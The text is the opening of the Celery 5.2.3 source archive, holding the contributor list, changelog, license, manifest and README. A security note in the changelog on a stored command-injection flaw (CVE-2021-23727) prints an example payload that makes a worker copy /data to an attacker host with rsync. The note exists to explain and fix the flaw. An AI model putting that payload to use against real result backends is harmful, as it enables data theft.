././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8637578 celery-5.2.3/0000775000175000017500000000000000000000000012675 5ustar00asifasif00000000000000././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1637501858.0 celery-5.2.3/CONTRIBUTORS.txt0000664000175000017500000001752600000000000015406 0ustar00asifasif00000000000000Every contribution to Celery is as important to us, as every coin in the money bin is to Scrooge McDuck. The first commit to the Celery codebase was made on Fri Apr 24 13:30:00 2009 +0200, and has since then been improved by many contributors. Everyone who have ever contributed to Celery should be in this list, but in a recent policy change it has been decided that everyone must add themselves here, and not be added by others, so it's currently incomplete waiting for everyone to add their names. The list of authors added before the policy change can be found in docs/AUTHORS.txt. -- Contributor offers to license certain software (a “Contribution” or multiple “Contributions”) to Celery, and Celery agrees to accept said Contributions, under the terms of the BSD open source license. Contributor understands and agrees that Celery shall have the irrevocable and perpetual right to make and distribute copies of any Contribution, as well as to create and distribute collective works and derivative works of any Contribution, under the BSD License. Contributors ------------ Asif Saif Uddin, 2016/08/30 Ask Solem, 2012/06/07 Sean O'Connor, 2012/06/07 Patrick Altman, 2012/06/07 Chris St. Pierre, 2012/06/07 Jeff Terrace, 2012/06/07 Mark Lavin, 2012/06/07 Jesper Noehr, 2012/06/07 Brad Jasper, 2012/06/07 Juan Catalano, 2012/06/07 Luke Zapart, 2012/06/07 Roger Hu, 2012/06/07 Honza Král, 2012/06/07 Aaron Elliot Ross, 2012/06/07 Alec Clowes, 2012/06/07 Daniel Watkins, 2012/06/07 Timo Sugliani, 2012/06/07 Yury V. Zaytsev, 2012/06/7 Marcin Kuźmiński, 2012/06/07 Norman Richards, 2012/06/07 Kevin Tran, 2012/06/07 David Arthur, 2012/06/07 Bryan Berg, 2012/06/07 Mikhail Korobov, 2012/06/07 Jerzy Kozera, 2012/06/07 Ben Firshman, 2012/06/07 Jannis Leidel, 2012/06/07 Chris Rose, 2012/06/07 Julien Poissonnier, 2012/06/07 Łukasz Oleś, 2012/06/07 David Strauss, 2012/06/07 Chris Streeter, 2012/06/07 Thomas Johansson, 2012/06/07 Ales Zoulek, 2012/06/07 Clay Gerrard, 2012/06/07 Matt Williamson, 2012/06/07 Travis Swicegood, 2012/06/07 Jeff Balogh, 2012/06/07 Harm Verhagen, 2012/06/07 Wes Winham, 2012/06/07 David Cramer, 2012/06/07 Steeve Morin, 2012/06/07 Mher Movsisyan, 2012/06/08 Chris Peplin, 2012/06/07 Florian Apolloner, 2012/06/07 Juarez Bochi, 2012/06/07 Christopher Angove, 2012/06/07 Jason Pellerin, 2012/06/07 Miguel Hernandez Martos, 2012/06/07 Neil Chintomby, 2012/06/07 Mauro Rocco, 2012/06/07 Ionut Turturica, 2012/06/07 Adriano Petrich, 2012/06/07 Michael Elsdörfer, 2012/06/07 Kornelijus Survila, 2012/06/07 Stefán Kjartansson, 2012/06/07 Keith Perkins, 2012/06/07 Flavio Percoco, 2012/06/07 Wes Turner, 2012/06/07 Vitaly Babiy, 2012/06/07 Tayfun Sen, 2012/06/08 Gert Van Gool, 2012/06/08 Akira Matsuzaki, 2012/06/08 Simon Josi, 2012/06/08 Sam Cooke, 2012/06/08 Frederic Junod, 2012/06/08 Roberto Gaiser, 2012/06/08 Piotr Sikora, 2012/06/08 Chris Adams, 2012/06/08 Branko Čibej, 2012/06/08 Vladimir Kryachko, 2012/06/08 Remy Noel 2012/06/08 Jude Nagurney, 2012/06/09 Jonatan Heyman, 2012/06/10 David Miller 2012/06/11 Matthew Morrison, 2012/06/11 Leo Dirac, 2012/06/11 Mark Thurman, 2012/06/11 Dimitrios Kouzis-Loukas, 2012/06/13 Steven Skoczen, 2012/06/17 Loren Abrams, 2012/06/19 Eran Rundstein, 2012/06/24 John Watson, 2012/06/27 Matt Long, 2012/07/04 David Markey, 2012/07/05 Jared Biel, 2012/07/05 Jed Smith, 2012/07/08 Łukasz Langa, 2012/07/10 Rinat Shigapov, 2012/07/20 Hynek Schlawack, 2012/07/23 Paul McMillan, 2012/07/26 Mitar, 2012/07/28 Adam DePue, 2012/08/22 Thomas Meson, 2012/08/28 Daniel Lundin, 2012/08/30 Alexey Zatelepin, 2012/09/18 Sundar Raman, 2012/09/24 Henri Colas, 2012/11/16 Thomas Grainger, 2012/11/29 Marius Gedminas, 2012/11/29 Christoph Krybus, 2013/01/07 Jun Sakai, 2013/01/16 Vlad Frolov, 2013/01/23 Milen Pavlov, 2013/03/08 Pär Wieslander, 2013/03/20 Theo Spears, 2013/03/28 Romuald Brunet, 2013/03/29 Aaron Harnly, 2013/04/04 Peter Brook, 2013/05/09 Muneyuki Noguchi, 2013/04/24 Stas Rudakou, 2013/05/29 Dong Weiming, 2013/06/27 Oleg Anashkin, 2013/06/27 Ross Lawley, 2013/07/05 Alain Masiero, 2013/08/07 Adrien Guinet, 2013/08/14 Christopher Lee, 2013/08/29 Alexander Smirnov, 2013/08/30 Matt Robenolt, 2013/08/31 Jameel Al-Aziz, 2013/10/04 Fazleev Maksim, 2013/10/08 Ian A Wilson, 2013/10/18 Daniel M Taub, 2013/10/22 Matt Wise, 2013/11/06 Michael Robellard, 2013/11/07 Vsevolod Kulaga, 2013/11/16 Ionel Cristian Mărieș, 2013/12/09 Константин Подшумок, 2013/12/16 Antoine Legrand, 2014/01/09 Pepijn de Vos, 2014/01/15 Dan McGee, 2014/01/27 Paul Kilgo, 2014/01/28 Môshe van der Sterre, 2014/01/31 Martin Davidsson, 2014/02/08 Chris Clark, 2014/02/20 Matthew Duggan, 2014/04/10 Brian Bouterse, 2014/04/10 Dmitry Malinovsky, 2014/04/28 Luke Pomfrey, 2014/05/06 Alexey Kotlyarov, 2014/05/16 Ross Deane, 2014/07/11 Tadej Janež, 2014/08/08 Akexander Koshelev, 2014/08/19 Davide Quarta, 2014/08/19 John Whitlock, 2014/08/19 Konstantinos Koukopoulos, 2014/08/24 Albert Yee Wang, 2014/08/29 Andrea Rabbaglietti, 2014/10/02 Joe Jevnik, 2014/10/22 Nathan Van Gheem, 2014/10/28 Gino Ledesma, 2014/10/28 Thomas French, 2014/11/10 Michael Permana, 2014/11/6 William King, 2014/11/21 Bert Vanderbauwhede, 2014/12/18 John Anderson, 2014/12/27 Luke Burden, 2015/01/24 Mickaël Penhard, 2015/02/15 Mark Parncutt, 2015/02/16 Samuel Jaillet, 2015/03/24 Ilya Georgievsky, 2015/03/31 Fatih Sucu, 2015/04/17 James Pulec, 2015/04/19 Alexander Lebedev, 2015/04/25 Frantisek Holop, 2015/05/21 Feanil Patel, 2015/05/21 Jocelyn Delalande, 2015/06/03 Justin Patrin, 2015/08/06 Juan Rossi, 2015/08/10 Piotr Maślanka, 2015/08/24 Gerald Manipon, 2015/10/19 Krzysztof Bujniewicz, 2015/10/21 Sukrit Khera, 2015/10/26 Dave Smith, 2015/10/27 Dennis Brakhane, 2015/10/30 Chris Harris, 2015/11/27 Valentyn Klindukh, 2016/01/15 Wayne Chang, 2016/01/15 Mike Attwood, 2016/01/22 David Harrigan, 2016/02/01 Ahmet Demir, 2016/02/27 Maxime Verger, 2016/02/29 Alexander Oblovatniy, 2016/03/10 Komu Wairagu, 2016/04/03 Joe Sanford, 2016/04/11 Takeshi Kanemoto, 2016/04/22 Arthur Vuillard, 2016/04/22 Colin McIntosh, 2016/04/26 Jeremy Zafran, 2016/05/17 Anand Reddy Pandikunta, 2016/06/18 Adriano Martins de Jesus, 2016/06/22 Kevin Richardson, 2016/06/29 Andrew Stewart, 2016/07/04 Xin Li, 2016/08/03 Alli Witheford, 2016/09/29 Alan Justino da Silva, 2016/10/14 Marat Sharafutdinov, 2016/11/04 Viktor Holmqvist, 2016/12/02 Rick Wargo, 2016/12/02 zhengxiaowai, 2016/12/07 Michael Howitz, 2016/12/08 Andreas Pelme, 2016/12/13 Mike Chen, 2016/12/20 Alejandro Pernin, 2016/12/23 Yuval Shalev, 2016/12/27 Morgan Doocy, 2017/01/02 Arcadiy Ivanov, 2017/01/08 Ryan Hiebert, 2017/01/20 Jianjian Yu, 2017/04/09 Brian May, 2017/04/10 Dmytro Petruk, 2017/04/12 Joey Wilhelm, 2017/04/12 Yoichi Nakayama, 2017/04/25 Simon Schmidt, 2017/05/19 Anthony Lukach, 2017/05/23 Samuel Dion-Girardeau, 2017/05/29 Aydin Sen, 2017/06/14 Vinod Chandru, 2017/07/11 Preston Moore, 2017/06/18 Nicolas Mota, 2017/08/10 David Davis, 2017/08/11 Martial Pageau, 2017/08/16 Sammie S. Taunton, 2017/08/17 Kxrr, 2017/08/18 Mads Jensen, 2017/08/20 Markus Kaiserswerth, 2017/08/30 Andrew Wong, 2017/09/07 Arpan Shah, 2017/09/12 Tobias 'rixx' Kunze, 2017/08/20 Mikhail Wolfson, 2017/12/11 Matt Davis, 2017/12/13 Alex Garel, 2018/01/04 Régis Behmo 2018/01/20 Igor Kasianov, 2018/01/20 Derek Harland, 2018/02/15 Chris Mitchell, 2018/02/27 Josue Balandrano Coronel, 2018/05/24 Federico Bond, 2018/06/20 Tom Booth, 2018/07/06 Axel haustant, 2018/08/14 Bruno Alla, 2018/09/27 Artem Vasilyev, 2018/11/24 Victor Mireyev, 2018/12/13 Florian Chardin, 2018/10/23 Shady Rafehi, 2019/02/20 Fabio Todaro, 2019/06/13 Shashank Parekh, 2019/07/11 Arel Cordero, 2019/08/29 Kyle Johnson, 2019/09/23 Dipankar Achinta, 2019/10/24 Sardorbek Imomaliev, 2020/01/24 Maksym Shalenyi, 2020/07/30 Frazer McLean, 2020/09/29 Henrik Bruåsdal, 2020/11/29 Tom Wojcik, 2021/01/24 Ruaridh Williamson, 2021/03/09 Garry Lawrence, 2021/06/19 Patrick Zhang, 2017/08/19 Konstantin Kochin, 2021/07/11 kronion, 2021/08/26 Gabor Boros, 2021/11/09 ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1640756913.0 celery-5.2.3/Changelog.rst0000664000175000017500000001704700000000000015327 0ustar00asifasif00000000000000.. _changelog: ================ Change history ================ This document contains change notes for bugfix & new features in the & 5.2.x series, please see :ref:`whatsnew-5.2` for an overview of what's new in Celery 5.2. .. _version-5.2.3: 5.2.3 ===== :release-date: 2021-12-29 12:00 P.M UTC+6:00 :release-by: Asif Saif Uddin - Allow redis >= 4.0.2. - Upgrade minimum required pymongo version to 3.11.1. - tested pypy3.8 beta (#6998). - Split Signature.__or__ into subclasses' __or__ (#7135). - Prevent duplication in event loop on Consumer restart. - Restrict setuptools>=59.1.1,<59.7.0. - Kombu bumped to v5.2.3 - py-amqp bumped to v5.0.9 - Some docs & CI improvements. .. _version-5.2.2: 5.2.2 ===== :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz - Various documentation fixes. - Fix CVE-2021-23727 (Stored Command Injection security vulnerability). When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: ``os.system("rsync /data attacker@192.168.56.100:~/data")`` by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload ``rsync /data attacker@192.168.56.100:~/data`` as the exception arguments like so: .. code-block:: python { "exc_module": "os", 'exc_type': "system", "exc_message": "rsync /data attacker@192.168.56.100:~/data" } According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading. .. _version-5.2.1: 5.2.1 ===== :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin - Fix rstrip usage on bytes instance in ProxyLogger. - Pass logfile to ExecStop in celery.service example systemd file. - fix: reduce latency of AsyncResult.get under gevent (#7052) - Limit redis version: <4.0.0. - Bump min kombu version to 5.2.2. - Change pytz>dev to a PEP 440 compliant pytz>0.dev.0. - Remove dependency to case (#7077). - fix: task expiration is timezone aware if needed (#7065). - Initial testing of pypy-3.8 beta to CI. - Docs, CI & tests cleanups. .. _version-5.2.0: 5.2.0 ===== :release-date: 2021-11-08 7.15 A.M UTC+6:00 :release-by: Asif Saif Uddin - Prevent from subscribing to empty channels (#7040) - fix register_task method. - Fire task failure signal on final reject (#6980) - Limit pymongo version: <3.12.1 (#7041) - Bump min kombu version to 5.2.1 .. _version-5.2.0rc2: 5.2.0rc2 ======== :release-date: 2021-11-02 1.54 P.M UTC+3:00 :release-by: Naomi Elstein - Bump Python 3.10.0 to rc2. - [pre-commit.ci] pre-commit autoupdate (#6972). - autopep8. - Prevent worker to send expired revoked items upon hello command (#6975). - docs: clarify the 'keeping results' section (#6979). - Update deprecated task module removal in 5.0 documentation (#6981). - [pre-commit.ci] pre-commit autoupdate. - try python 3.10 GA. - mention python 3.10 on readme. - Documenting the default consumer_timeout value for rabbitmq >= 3.8.15. - Azure blockblob backend parametrized connection/read timeouts (#6978). - Add as_uri method to azure block blob backend. - Add possibility to override backend implementation with celeryconfig (#6879). - [pre-commit.ci] pre-commit autoupdate. - try to fix deprecation warning. - [pre-commit.ci] pre-commit autoupdate. - not needed anyore. - not needed anyore. - not used anymore. - add github discussions forum .. _version-5.2.0rc1: 5.2.0rc1 ======== :release-date: 2021-09-26 4.04 P.M UTC+3:00 :release-by: Omer Katz - Kill all workers when main process exits in prefork model (#6942). - test kombu 5.2.0rc1 (#6947). - try moto 2.2.x (#6948). - Prepared Hacker News Post on Release Action. - update setup with python 3.7 as minimum. - update kombu on setupcfg. - Added note about automatic killing all child processes of worker after its termination. - [pre-commit.ci] pre-commit autoupdate. - Move importskip before greenlet import (#6956). - amqp: send expiration field to broker if requested by user (#6957). - Single line drift warning. - canvas: fix kwargs argument to prevent recursion (#6810) (#6959). - Allow to enable Events with app.conf mechanism. - Warn when expiration date is in the past. - Add the Framework :: Celery trove classifier. - Give indication whether the task is replacing another (#6916). - Make setup.py executable. - Bump version: 5.2.0b3 → 5.2.0rc1. .. _version-5.2.0b3: 5.2.0b3 ======= :release-date: 2021-09-02 8.38 P.M UTC+3:00 :release-by: Omer Katz - Add args to LOG_RECEIVED (fixes #6885) (#6898). - Terminate job implementation for eventlet concurrency backend (#6917). - Add cleanup implementation to filesystem backend (#6919). - [pre-commit.ci] pre-commit autoupdate (#69). - Add before_start hook (fixes #4110) (#6923). - Restart consumer if connection drops (#6930). - Remove outdated optimization documentation (#6933). - added https verification check functionality in arangodb backend (#6800). - Drop Python 3.6 support. - update supported python versions on readme. - [pre-commit.ci] pre-commit autoupdate (#6935). - Remove appveyor configuration since we migrated to GA. - pyugrade is now set to upgrade code to 3.7. - Drop exclude statement since we no longer test with pypy-3.6. - 3.10 is not GA so it's not supported yet. - Celery 5.1 or earlier support Python 3.6. - Fix linting error. - fix: Pass a Context when chaining fail results (#6899). - Bump version: 5.2.0b2 → 5.2.0b3. .. _version-5.2.0b2: 5.2.0b2 ======= :release-date: 2021-08-17 5.35 P.M UTC+3:00 :release-by: Omer Katz - Test windows on py3.10rc1 and pypy3.7 (#6868). - Route chord_unlock task to the same queue as chord body (#6896). - Add message properties to app.tasks.Context (#6818). - handle already converted LogLevel and JSON (#6915). - 5.2 is codenamed dawn-chorus. - Bump version: 5.2.0b1 → 5.2.0b2. .. _version-5.2.0b1: 5.2.0b1 ======= :release-date: 2021-08-11 5.42 P.M UTC+3:00 :release-by: Omer Katz - Add Python 3.10 support (#6807). - Fix docstring for Signal.send to match code (#6835). - No blank line in log output (#6838). - Chords get body_type independently to handle cases where body.type does not exist (#6847). - Fix #6844 by allowing safe queries via app.inspect().active() (#6849). - Fix multithreaded backend usage (#6851). - Fix Open Collective donate button (#6848). - Fix setting worker concurrency option after signal (#6853). - Make ResultSet.on_ready promise hold a weakref to self (#6784). - Update configuration.rst. - Discard jobs on flush if synack isn't enabled (#6863). - Bump click version to 8.0 (#6861). - Amend IRC network link to Libera (#6837). - Import celery lazily in pytest plugin and unignore flake8 F821, "undefined name '...'" (#6872). - Fix inspect --json output to return valid json without --quiet. - Remove celery.task references in modules, docs (#6869). - The Consul backend must correctly associate requests and responses (#6823). ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/LICENSE0000664000175000017500000000510700000000000013705 0ustar00asifasif00000000000000Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved. Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved. Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved. Celery is licensed under The BSD License (3 Clause, also known as the new BSD license). The license is an OSI approved Open Source license and is GPL-compatible(1). The license text can also be found here: http://www.opensource.org/licenses/BSD-3-Clause License ======= Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of Ask Solem, nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Documentation License ===================== The documentation portion of Celery (the rendered contents of the "docs" directory of a software distribution or checkout) is supplied under the "Creative Commons Attribution-ShareAlike 4.0 International" (CC BY-SA 4.0) License as described by https://creativecommons.org/licenses/by-sa/4.0/ Footnotes ========= (1) A GPL-compatible license makes it possible to combine Celery with other software that is released under the GPL, it does not mean that we're distributing Celery under the GPL license. The BSD license, unlike the GPL, let you distribute a modified version without making your changes open source. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/MANIFEST.in0000664000175000017500000000130500000000000014432 0ustar00asifasif00000000000000include CONTRIBUTORS.txt include Changelog.rst include LICENSE include README.rst include MANIFEST.in include TODO include setup.cfg include setup.py recursive-include t *.py *.rst recursive-include docs * recursive-include extra/bash-completion * recursive-include extra/centos * recursive-include extra/generic-init.d * recursive-include extra/macOS * recursive-include extra/supervisord * recursive-include extra/systemd * recursive-include extra/zsh-completion * recursive-include examples * recursive-include requirements *.txt *.rst recursive-include celery/utils/static *.png recursive-exclude docs/_build * recursive-exclude * __pycache__ recursive-exclude * *.py[co] recursive-exclude * .*.sw[a-z] ././@PaxHeader0000000000000000000000000000003400000000000011452 xustar000000000000000028 mtime=1640757094.8637578 celery-5.2.3/PKG-INFO0000664000175000017500000004261400000000000014001 0ustar00asifasif00000000000000Metadata-Version: 2.1 Name: celery Version: 5.2.3 Summary: Distributed Task Queue. Home-page: http://celeryproject.org Author: Ask Solem Author-email: auvipy@gmail.com License: BSD Project-URL: Documentation, https://docs.celeryproject.org/en/latest/index.html Project-URL: Changelog, https://docs.celeryproject.org/en/stable/changelog.html Project-URL: Code, https://github.com/celery/celery Project-URL: Tracker, https://github.com/celery/celery/issues Project-URL: Funding, https://opencollective.com/celery Keywords: task job queue distributed messaging actor Platform: any Classifier: Development Status :: 5 - Production/Stable Classifier: License :: OSI Approved :: BSD License Classifier: Topic :: System :: Distributed Computing Classifier: Topic :: Software Development :: Object Brokering Classifier: Framework :: Celery Classifier: Programming Language :: Python Classifier: Programming Language :: Python :: 3 :: Only Classifier: Programming Language :: Python :: 3 Classifier: Programming Language :: Python :: 3.7 Classifier: Programming Language :: Python :: 3.8 Classifier: Programming Language :: Python :: 3.9 Classifier: Programming Language :: Python :: 3.10 Classifier: Programming Language :: Python :: Implementation :: CPython Classifier: Programming Language :: Python :: Implementation :: PyPy Classifier: Operating System :: OS Independent Requires-Python: >=3.7, Provides-Extra: dynamodb Provides-Extra: consul Provides-Extra: auth Provides-Extra: sqlalchemy Provides-Extra: memcache Provides-Extra: pyro Provides-Extra: yaml Provides-Extra: pytest Provides-Extra: zookeeper Provides-Extra: mongodb Provides-Extra: azureblockblob Provides-Extra: sqs Provides-Extra: cosmosdbsql Provides-Extra: django Provides-Extra: brotli Provides-Extra: eventlet Provides-Extra: librabbitmq Provides-Extra: couchdb Provides-Extra: arangodb Provides-Extra: tblib Provides-Extra: redis Provides-Extra: slmq Provides-Extra: msgpack Provides-Extra: elasticsearch Provides-Extra: cassandra Provides-Extra: gevent Provides-Extra: zstd Provides-Extra: pymemcache Provides-Extra: couchbase Provides-Extra: s3 Provides-Extra: solar License-File: LICENSE .. image:: http://docs.celeryproject.org/en/latest/_images/celery-banner-small.png |build-status| |coverage| |license| |wheel| |pyversion| |pyimp| |ocbackerbadge| |ocsponsorbadge| :Version: 5.2.3 (dawn-chorus) :Web: https://docs.celeryproject.org/en/stable/index.html :Download: https://pypi.org/project/celery/ :Source: https://github.com/celery/celery/ :Keywords: task, queue, job, async, rabbitmq, amqp, redis, python, distributed, actors Donations ========= This project relies on your generous donations. If you are using Celery to create a commercial product, please consider becoming our `backer`_ or our `sponsor`_ to ensure Celery's future. .. _`backer`: https://opencollective.com/celery#backer .. _`sponsor`: https://opencollective.com/celery#sponsor For enterprise ============== Available as part of the Tidelift Subscription. The maintainers of ``celery`` and thousands of other packages are working with Tidelift to deliver commercial support and maintenance for the open source dependencies you use to build your applications. Save time, reduce risk, and improve code health, while paying the maintainers of the exact dependencies you use. `Learn more. `_ What's a Task Queue? ==================== Task queues are used as a mechanism to distribute work across threads or machines. A task queue's input is a unit of work, called a task, dedicated worker processes then constantly monitor the queue for new work to perform. Celery communicates via messages, usually using a broker to mediate between clients and workers. To initiate a task a client puts a message on the queue, the broker then delivers the message to a worker. A Celery system can consist of multiple workers and brokers, giving way to high availability and horizontal scaling. Celery is written in Python, but the protocol can be implemented in any language. In addition to Python there's node-celery_ for Node.js, a `PHP client`_, `gocelery`_ for golang, and rusty-celery_ for Rust. Language interoperability can also be achieved by using webhooks in such a way that the client enqueues an URL to be requested by a worker. .. _node-celery: https://github.com/mher/node-celery .. _`PHP client`: https://github.com/gjedeer/celery-php .. _`gocelery`: https://github.com/gocelery/gocelery .. _rusty-celery: https://github.com/rusty-celery/rusty-celery What do I need? =============== Celery version 5.2.0 runs on, - Python (3.7, 3.8, 3.9, 3.10) - PyPy3.7 (7.3.7+) This is the version of celery which will support Python 3.7 or newer. If you're running an older version of Python, you need to be running an older version of Celery: - Python 2.6: Celery series 3.1 or earlier. - Python 2.5: Celery series 3.0 or earlier. - Python 2.4: Celery series 2.2 or earlier. - Python 2.7: Celery 4.x series. - Python 3.6: Celery 5.1 or earlier. Celery is a project with minimal funding, so we don't support Microsoft Windows. Please don't open any issues related to that platform. *Celery* is usually used with a message broker to send and receive messages. The RabbitMQ, Redis transports are feature complete, but there's also experimental support for a myriad of other solutions, including using SQLite for local development. *Celery* can run on a single machine, on multiple machines, or even across datacenters. Get Started =========== If this is the first time you're trying to use Celery, or you're new to Celery v5.2.0 coming from previous versions then you should read our getting started tutorials: - `First steps with Celery`_ Tutorial teaching you the bare minimum needed to get started with Celery. - `Next steps`_ A more complete overview, showing more features. .. _`First steps with Celery`: http://docs.celeryproject.org/en/latest/getting-started/first-steps-with-celery.html .. _`Next steps`: http://docs.celeryproject.org/en/latest/getting-started/next-steps.html You can also get started with Celery by using a hosted broker transport CloudAMQP. The largest hosting provider of RabbitMQ is a proud sponsor of Celery. Celery is... ============= - **Simple** Celery is easy to use and maintain, and does *not need configuration files*. It has an active, friendly community you can talk to for support, like at our `mailing-list`_, or the IRC channel. Here's one of the simplest applications you can make: .. code-block:: python from celery import Celery app = Celery('hello', broker='amqp://guest@localhost//') @app.task def hello(): return 'hello world' - **Highly Available** Workers and clients will automatically retry in the event of connection loss or failure, and some brokers support HA in way of *Primary/Primary* or *Primary/Replica* replication. - **Fast** A single Celery process can process millions of tasks a minute, with sub-millisecond round-trip latency (using RabbitMQ, py-librabbitmq, and optimized settings). - **Flexible** Almost every part of *Celery* can be extended or used on its own, Custom pool implementations, serializers, compression schemes, logging, schedulers, consumers, producers, broker transports, and much more. It supports... ================ - **Message Transports** - RabbitMQ_, Redis_, Amazon SQS - **Concurrency** - Prefork, Eventlet_, gevent_, single threaded (``solo``) - **Result Stores** - AMQP, Redis - memcached - SQLAlchemy, Django ORM - Apache Cassandra, IronCache, Elasticsearch - **Serialization** - *pickle*, *json*, *yaml*, *msgpack*. - *zlib*, *bzip2* compression. - Cryptographic message signing. .. _`Eventlet`: http://eventlet.net/ .. _`gevent`: http://gevent.org/ .. _RabbitMQ: https://rabbitmq.com .. _Redis: https://redis.io .. _SQLAlchemy: http://sqlalchemy.org Framework Integration ===================== Celery is easy to integrate with web frameworks, some of which even have integration packages: +--------------------+------------------------+ | `Django`_ | not needed | +--------------------+------------------------+ | `Pyramid`_ | `pyramid_celery`_ | +--------------------+------------------------+ | `Pylons`_ | `celery-pylons`_ | +--------------------+------------------------+ | `Flask`_ | not needed | +--------------------+------------------------+ | `web2py`_ | `web2py-celery`_ | +--------------------+------------------------+ | `Tornado`_ | `tornado-celery`_ | +--------------------+------------------------+ The integration packages aren't strictly necessary, but they can make development easier, and sometimes they add important hooks like closing database connections at ``fork``. .. _`Django`: https://djangoproject.com/ .. _`Pylons`: http://pylonsproject.org/ .. _`Flask`: http://flask.pocoo.org/ .. _`web2py`: http://web2py.com/ .. _`Bottle`: https://bottlepy.org/ .. _`Pyramid`: http://docs.pylonsproject.org/en/latest/docs/pyramid.html .. _`pyramid_celery`: https://pypi.org/project/pyramid_celery/ .. _`celery-pylons`: https://pypi.org/project/celery-pylons/ .. _`web2py-celery`: https://code.google.com/p/web2py-celery/ .. _`Tornado`: http://www.tornadoweb.org/ .. _`tornado-celery`: https://github.com/mher/tornado-celery/ .. _celery-documentation: Documentation ============= The `latest documentation`_ is hosted at Read The Docs, containing user guides, tutorials, and an API reference. 最新的中文文档托管在 https://www.celerycn.io/ 中,包含用户指南、教程、API接口等。 .. _`latest documentation`: http://docs.celeryproject.org/en/latest/ .. _celery-installation: Installation ============ You can install Celery either via the Python Package Index (PyPI) or from source. To install using ``pip``: :: $ pip install -U Celery .. _bundles: Bundles ------- Celery also defines a group of bundles that can be used to install Celery and the dependencies for a given feature. You can specify these in your requirements or on the ``pip`` command-line by using brackets. Multiple bundles can be specified by separating them by commas. :: $ pip install "celery[amqp]" $ pip install "celery[amqp,redis,auth,msgpack]" The following bundles are available: Serializers ~~~~~~~~~~~ :``celery[auth]``: for using the ``auth`` security serializer. :``celery[msgpack]``: for using the msgpack serializer. :``celery[yaml]``: for using the yaml serializer. Concurrency ~~~~~~~~~~~ :``celery[eventlet]``: for using the ``eventlet`` pool. :``celery[gevent]``: for using the ``gevent`` pool. Transports and Backends ~~~~~~~~~~~~~~~~~~~~~~~ :``celery[amqp]``: for using the RabbitMQ amqp python library. :``celery[redis]``: for using Redis as a message transport or as a result backend. :``celery[sqs]``: for using Amazon SQS as a message transport. :``celery[tblib``]: for using the ``task_remote_tracebacks`` feature. :``celery[memcache]``: for using Memcached as a result backend (using ``pylibmc``) :``celery[pymemcache]``: for using Memcached as a result backend (pure-Python implementation). :``celery[cassandra]``: for using Apache Cassandra as a result backend with DataStax driver. :``celery[azureblockblob]``: for using Azure Storage as a result backend (using ``azure-storage``) :``celery[s3]``: for using S3 Storage as a result backend. :``celery[couchbase]``: for using Couchbase as a result backend. :``celery[arangodb]``: for using ArangoDB as a result backend. :``celery[elasticsearch]``: for using Elasticsearch as a result backend. :``celery[riak]``: for using Riak as a result backend. :``celery[cosmosdbsql]``: for using Azure Cosmos DB as a result backend (using ``pydocumentdb``) :``celery[zookeeper]``: for using Zookeeper as a message transport. :``celery[sqlalchemy]``: for using SQLAlchemy as a result backend (*supported*). :``celery[pyro]``: for using the Pyro4 message transport (*experimental*). :``celery[slmq]``: for using the SoftLayer Message Queue transport (*experimental*). :``celery[consul]``: for using the Consul.io Key/Value store as a message transport or result backend (*experimental*). :``celery[django]``: specifies the lowest version possible for Django support. You should probably not use this in your requirements, it's here for informational purposes only. .. _celery-installing-from-source: Downloading and installing from source -------------------------------------- Download the latest version of Celery from PyPI: https://pypi.org/project/celery/ You can install it by doing the following,: :: $ tar xvfz celery-0.0.0.tar.gz $ cd celery-0.0.0 $ python setup.py build # python setup.py install The last command must be executed as a privileged user if you aren't currently using a virtualenv. .. _celery-installing-from-git: Using the development version ----------------------------- With pip ~~~~~~~~ The Celery development version also requires the development versions of ``kombu``, ``amqp``, ``billiard``, and ``vine``. You can install the latest snapshot of these using the following pip commands: :: $ pip install https://github.com/celery/celery/zipball/master#egg=celery $ pip install https://github.com/celery/billiard/zipball/master#egg=billiard $ pip install https://github.com/celery/py-amqp/zipball/master#egg=amqp $ pip install https://github.com/celery/kombu/zipball/master#egg=kombu $ pip install https://github.com/celery/vine/zipball/master#egg=vine With git ~~~~~~~~ Please see the Contributing section. .. _getting-help: Getting Help ============ .. 